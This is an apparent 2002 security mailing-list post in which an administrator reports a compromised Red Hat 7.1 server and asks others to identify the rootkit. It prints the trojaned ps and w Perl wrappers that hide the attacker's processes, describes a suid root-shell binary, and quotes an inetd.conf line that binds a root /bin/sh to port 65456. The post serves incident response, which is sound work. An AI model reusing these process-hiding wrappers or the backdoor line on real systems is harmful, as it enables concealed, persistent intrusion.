nouser - rootkit ?

From: Dan Uscatu (
Date: 02/11/02

From: "Dan Uscatu" <>
To: <>
Date: Mon, 11 Feb 2002 01:44:31 +0200

 i found today something funny happening when i tried to install a web
 on a customer's machine:
 1. w - returned some weird "/usr/bin/perl" processes
 2. ps - was not showing everything
 3. two connections to some irc servers; fuser - finding the process id's
 them, but ps not showing them

 some infos about the server (unfortunately it wasnt installed by me...):
 [root@www root]# uname -a
 Linux www 2.4.2-2 #1 Sun Apr 8 20:41:30 EDT 2001 i686 unknown (compiled in
 the future too, lol)
 [root@www /root]# cat /etc/redhat-release
 Red Hat Linux release 7.1 (Seawolf)

 more digging... so i found some modified files:

 [root@www nouser]# ls -l /bin/ps
 -rwxr-xr-x 1 nouser nouser 188 Mar 2 15:45 /bin/ps

 [root@www /root]# cat /bin/ps
 $xargs =join(' ',@ARGV);
 $ps = `/usr/lib/libxnotps $xargs \| grep -v nouser \| grep -v noshell \|
 grep -v proftp \| grep -v \"/bin/ps\" \| grep -v libxnotps`;
 print "$ps";
 [root@www /root]# ls -l /usr/lib/libxnotps
 -r-xr-xr-x 1 root root 64092 Apr 5 2001 /usr/lib/libxnotps

 [root@www nouser]# ls -l /usr/bin/w
 -rwxr-xr-x 1 nouser nouser 105 Jan 20 01:03 /usr/bin/w

 [root@www /root]# cat /usr/bin/w
 $xargs =join(' ',@ARGV);
 $w = `/usr/lib/libxyotps $xargs \| grep -v nouser`;
 print "$w";
 [root@www /root]# ls -l /usr/lib/libxyotps
 -r-xr-xr-x 1 root root 8688 Apr 5 2001 /usr/lib/libxyotps

 there is another file called /usr/lib/libxzotps, but i couldnt find what is
 pointing at that, yet
 no reference found on the web, searching for "libxnotps" or "libxnotps" or

 [root@www nouser]# grep nouser /etc/passwd

 [root@www nouser]# ls -l /sbin/nouser
 total 3328
-rw-r--r-- 1 nouser nouser 80092 Mar 2 23:22 broadcast-5000.log
-rw-r--r-- 1 nouser nouser 3057793 Mar 2 23:22 broadcast-full.log
drwxr-xr-x 2 nouser nouser 4096 Mar 2 13:01 Desktop
drwxrwxr-x 4 nouser nouser 4096 Mar 5 19:23 iroffer
-rw-rw-r-- 1 nouser nouser 206865 Mar 5 19:23 iroffer.tar.gz
-rwsr-xr-x 1 root root 13855 Mar 2 13:04 nouser
-rw-rw-r-- 1 root root 2215 Mar 2 23:23
drwxrwxr-x 3 nouser nouser 4096 Jan 20 01:15 scan-1
drwxr-xr-x 3 nouser root 4096 Mar 2 13:04 scan-2
drwxr-xr-x 3 nouser root 4096 Mar 2 13:04 scan-3
drwxrwxr-x 3 nouser nouser 4096 Jan 20 01:13 war

 of course the suid "nouser" gives a root shell... and the directories are
full of war scripts, flood tools, and warez... given away through irc bots

i have scanned the machine using chkroot kit... the only funny thing found
was an inetd.conf, containing:

 [root@www nouser]# cat /etc/inetd.conf
65456 stream tcp nowait root /bin/sh sh

 of course, inetd is not installed :) that points me to the idea that the
process was somehow automated... but i cant find any reference to a rootkit
that does these changes. seems pretty stupid for a rootkit anyway... but i
want to be sure no other major changes were made... before i install the
production server there.

thanks for any comments

This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: